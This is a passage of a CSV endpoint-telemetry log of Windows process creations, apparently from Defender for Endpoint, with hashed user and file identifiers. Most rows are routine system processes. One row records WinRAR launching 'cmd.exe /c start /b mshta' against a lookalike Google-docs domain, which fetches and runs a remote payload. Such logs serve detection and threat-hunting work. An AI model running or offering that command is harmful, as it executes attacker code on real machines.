Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+471,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:55:32.422340700+00:00,6652,SenseCncProxy.exe,4504,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:55:32.488819600+00:00,2021-06-23 00:57:10.191834500+00:00,a0c51259-7266-4dee-9115-9c409056909f,computerpii_0a470890c60768167990033d701e7bd881398861,155603,False,10.7740.19041.1052,False,11540474045137006,,11540474045171977,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,2176,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+472,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:56:38.331186800+00:00,9544,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_whrjym 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:56:38.465672800+00:00,2021-06-23 00:57:10.201178700+00:00,1b7d59f5-9951-4815-9ac9-966dee3a22e0,computerpii_0a470890c60768167990033d701e7bd881398861,155870,False,10.7740.19041.1052,False,11540474045136991,,11540474045171980,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+473,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:56:38.339771200+00:00,8880,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:56:38.331186800+00:00,9544,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_whrjym 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:56:38.467596500+00:00,2021-06-23 00:57:10.201211700+00:00,5a0ef122-ca6c-4bc0-a624-74460f9a551d,computerpii_0a470890c60768167990033d701e7bd881398861,155871,False,10.7740.19041.1052,False,11540474045171980,,11540474045171981,2021-06-23 00:56:38.331186800+00:00,9544,2021-06-23 00:56:38.331186800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,9544,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+474,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:56:39.338352900+00:00,18088,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe627_ Global\UsGthrCtrlFltPipeMssGthrPipe627 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:56:39.769050100+00:00,2021-06-23 00:57:10.201320700+00:00,84c3b834-4062-4912-b82d-addb94d68190,computerpii_0a470890c60768167990033d701e7bd881398861,155874,False,10.7740.19041.1052,False,11540474045144190,,11540474045171982,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+475,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:56:39.769461900+00:00,3452,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ajtoqn 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:56:39.860524900+00:00,2021-06-23 00:57:10.201455500+00:00,331cb523-b256-4031-821d-76199e1d6d97,computerpii_0a470890c60768167990033d701e7bd881398861,155878,False,10.7740.19041.1052,False,11540474045136991,,11540474045171984,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+476,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:56:39.776899100+00:00,20220,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:56:39.769461900+00:00,3452,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ajtoqn 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:56:39.863029100+00:00,2021-06-23 00:57:10.201488900+00:00,302b94d8-f035-4234-ba9a-762cf0033fa0,computerpii_0a470890c60768167990033d701e7bd881398861,155879,False,10.7740.19041.1052,False,11540474045171984,,11540474045171985,2021-06-23 00:56:39.769461900+00:00,3452,2021-06-23 00:56:39.769461900+00:00,AGMService.exe,3452,18688,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+477,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:14.146601200+00:00,6844,cmd.exe,"""cmd.exe"" /c start /b mshta https://page.googledocpage.com/zOBOvBYm550gShsdwEAKoJUi95+jr4jqgNQ/2N18Q7Y=",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,d9e5fc5762493ad57fe354558b0a21b5,e602e65ce7bde0e923af34f8439c0373e585abbb462ac3d07068b225880e6fbd,d10cf48e6453705ed69d6c755cb77f17033bd3da,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:00.312815800+00:00,9016,WinRAR.exe,"""WinRAR.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_46f5850694e4c376b5108164be1f70ca78fce205.rar""",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:14.160138600+00:00,2021-06-23 03:10:43.848162100+00:00,39a08d19-85a4-4650-a14b-e192a8c458c3,computerpii_0a470890c60768167990033d701e7bd881398861,160853,False,10.7740.19041.1052,False,11540474045172973,,11540474045172975,2021-06-23 03:08:00.312815800+00:00,9016,2021-06-23 03:08:00.312815800+00:00,\Device\HarddiskVolume3\Program Files\WinRAR\WinRAR.exe,9016,16512,ActiveProcessStartkey,C:\Program Files\WinRAR,2637464,2021-06-11 09:16:03+00:00,2021-06-14 06:57:29.566212700+00:00,2021-06-23 03:05:46.311334900+00:00,2021-06-23 03:05:38.655932+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1025.0,1.0,2049.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Alexander Roshal,WinRAR,6.2.0,WinRAR,WinRAR.exe,WinRAR archiver,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+478,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:27:47.843626800+00:00,13164,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320635_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320635 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:27:48.106118600+00:00,2021-06-23 01:29:44.702293800+00:00,2021b6e7-ea0f-4efc-9a35-f3f422cf24e0,computerpii_0a470890c60768167990033d701e7bd881398861,158564,False,10.7740.19041.1052,False,11540474045144190,,11540474045172457,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,20480.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+479,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:29:17.323672300+00:00,16020,POWERPNT.EXE,"""POWERPNT.EXE"" /vu ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_b482cd52b12d0a79204c505c55f198b2445fd39b.pptx""",PortableExecutable,2021-06-12 08:57:24.795700200+00:00,C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE,1874760,2bccd69cb76754cebaa82f0779f00233,1bfa9c06fc6e8361147a0a1d39eb9b59c813de8c4dd25279d9a23a07ce8d901a,349dab97f128e1b86e88ed4c022a5a17f0e6af0a,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:29:17.537645700+00:00,2021-06-23 01:29:44.703277300+00:00,6af07af0-e12b-472e-ba8f-7074fc5b0f3f,computerpii_0a470890c60768167990033d701e7bd881398861,158585,False,10.7740.19041.1052,False,11540474045171845,,11540474045172460,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Office,16.0.13801.20738,POWERPNT,POWERPNT.EXE,Microsoft PowerPoint
+480,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:43:04.381108800+00:00,13916,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320759_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320759 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:43:04.481334700+00:00,2021-06-24 02:43:22.929823400+00:00,26b7f6f4-e03c-4600-ba6f-4c340e0aa2e1,computerpii_0a470890c60768167990033d701e7bd881398861,173563,True,10.7740.19041.1052,False,11540474045144190,,11540474045176069,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
